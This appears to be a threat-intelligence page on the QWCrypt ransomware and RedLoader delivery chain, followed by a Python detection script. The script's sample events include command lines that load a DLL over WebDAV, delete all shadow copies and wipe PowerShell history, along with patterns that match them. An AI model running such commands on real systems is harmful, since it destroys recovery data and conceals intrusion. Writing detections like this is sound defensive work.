QWCrypt and RedLoader multi-stage ransomware activity
Malware Activity
Summary
The QWCrypt ransomware chain is now notable because it has reached successful deployment in at least three attacks, using RedLoader and a customized Terminator tool to stage payloads, discover hosts, and disable defenses. The activity relies on spear-phishing resumes and a multi-stage Windows delivery chain whose payload formats shifted in April 2025 and again in July 2025. RedLoader reports infected hosts to C2 infrastructure and runs PowerShell for Active Directory discovery, while the final scripts delete volume shadow copies to hinder recovery and clear console history to hinder investigation. The result is a tailored ransomware workflow that can spread across endpoint devices and hypervisors in victim environments.
Related Happenings
Medusa ransomware post-compromise deployment
Malware Activity
First: 07.04.2026 09:35
Last: 07.04.2026 09:35
Sources 1
About this happening:
**Medusa ransomware** is being deployed rapidly after initial access, turning intrusions into fast-moving extortion events and shrinking defenders' response time. The malware acti...
TeamPCP and Vect partner to turn supply-chain compromises into ransomware follow-on campaigns
Threat Actor Meta
First: 31.03.2026 15:15
Last: 31.03.2026 15:15
Sources 1
About this happening:
TeamPCP and **Vect ransomware group** are linking **supply-chain compromises** to **follow-on ransomware campaigns**, broadening extortion risk for affected organizations. The shi...
2025 Ransomware trend toward built-in Windows tooling and lower ransom payment rates
Target Trend
First: 17.03.2026 23:41
Last: 17.03.2026 23:41
Sources 1
About this happening:
**Ransomware operators** are increasingly leaning on **built-in Windows tooling** while **ransom payment rates** continue to decline across **2025**, weakening extortion returns f...
Phorpiex "Your Document" phishing campaign
Campaign
First: 10.02.2026 18:00
Last: 10.02.2026 18:00
Sources 1
About this happening:
**Phorpiex** is driving a **high-volume phishing campaign** that uses the lure **"Your Document"** and weaponised **.lnk** attachments to start a multi-stage infection chain. The...
Reynolds side-loaded-loader and GotoHTTP ransomware campaign
Campaign
First: 10.02.2026 16:36
Last: 10.02.2026 16:36
Sources 1
About this happening:
The **Reynolds** ransomware operation now shows **pre-deployment staging** and **post-deployment access tooling**, increasing the likelihood of persistent compromise on the target...
Timeline
09.12.2025 11:35 2 articles · 5mo ago
QWCrypt and RedLoader multi-stage ransomware activity
Initial Disclosure: The activity begins with **spear-phishing resumes** delivered through job-application workflows and booby-trapped links. Initial payload stages then use **WebDAV**, **rundll32.exe**, and **Adobe** DLL sideloading to establish **RedLoader**.
- STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware — thehackernews.com — 09.12.2025 11:35
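A detection sketch for the behaviours the summary and the timeline entry name (rundll32.exe loading a DLL from a WebDAV share, PowerShell Active Directory discovery, shadow-copy deletion, console-history clearing), added here as an illustrative example; it is not code from the source article, from RedLoader, or from the QWCrypt operators. The sample process-creation events, host names, the 203.0.113.10 address, file paths and exact command lines are constructed, and the specific cmdlets and the `@SSL`/`DavWWWRoot` WebDAV path forms are assumptions about how such activity commonly appears in telemetry, not indicators taken from the page.

```python
import re

# Constructed sample process-creation events (Sysmon EventID 1 / Security 4688 style).
# Hosts, the 203.0.113.10 address, paths and command lines are made up for this example.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe \\203.0.113.10@SSL\DavWWWRoot\stage\loader.dll,Start"},
    {"id": 2, "host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -nop -w hidden -c "Get-ADComputer -Filter * -Properties OperatingSystem"'},
    {"id": 3, "host": "WS01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"id": 4, "host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -c "Clear-History; Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -Force"'},
    # Benign look-alikes the rules must not flag: listing shadows, loading a local system DLL.
    {"id": 5, "host": "WS02", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe list shadows"},
    {"id": 6, "host": "WS02", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# (rule name, allowed image basenames or None for any image, pattern over the command line).
# The cmdlet list and WebDAV path forms are assumptions, not indicators from the page.
RULES = [
    ("rundll32_webdav_load", {"rundll32.exe"},
     re.compile(r"\\\\\S+?(@SSL|\\DavWWWRoot)\\", re.I)),
    ("powershell_ad_discovery", {"powershell.exe", "pwsh.exe"},
     re.compile(r"Get-AD(Computer|User|Domain|DomainController|Group|Trust)\b"
                r"|\[adsisearcher\]|System\.DirectoryServices", re.I)),
    ("shadow_copy_deletion", None,
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|Win32_ShadowCopy.*\bDelete\b", re.I)),
    ("console_history_clear", {"powershell.exe", "pwsh.exe", "cmd.exe"},
     re.compile(r"Clear-History|ConsoleHost_history\.txt", re.I)),
]

RECOVERY_HINDERING = {"shadow_copy_deletion", "console_history_clear"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(event):
    """Return the names of all rules that fire on a single event."""
    image = _basename(event["image"])
    hits = []
    for name, images, pattern in RULES:
        if images is not None and image not in images:
            continue
        if pattern.search(event["cmd"]):
            hits.append(name)
    return hits


def detect(events):
    """Map event id -> rule names for every event that fires at least one rule."""
    results = {}
    for event in events:
        hits = match_rules(event)
        if hits:
            results[event["id"]] = hits
    return results


def stage_sequence(events, host):
    """Rule names in order of first appearance on one host, so an analyst can see
    whether the observed order follows the loader -> discovery -> impact chain."""
    seen = []
    for event in sorted((e for e in events if e["host"] == host), key=lambda e: e["id"]):
        for name in match_rules(event):
            if name not in seen:
                seen.append(name)
    return seen


def hosts_with_recovery_hindering(events):
    """Hosts where shadow-copy deletion and history clearing both appear. Either alone
    is noisy (backup jobs, admins tidying up); the pair together is a strong signal."""
    by_host = {}
    for event in events:
        by_host.setdefault(event["host"], set()).update(match_rules(event))
    return sorted(h for h, rules in by_host.items() if RECOVERY_HINDERING <= rules)


if __name__ == "__main__":
    for event_id, rules in detect(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
    print("stage order on WS01:", " -> ".join(stage_sequence(SAMPLE_EVENTS, "WS01")))
    print("hosts with shadow deletion + history clearing:", hosts_with_recovery_hindering(SAMPLE_EVENTS))
```

The per-event rules are deliberately narrow (image basename plus command-line pattern) so that `vssadmin list shadows` and a local `rundll32.exe` invocation stay quiet; the host-level correlation is where the value sits, because the page's final-stage pair of shadow-copy deletion and history clearing on the same host is far less ambiguous than either command on its own.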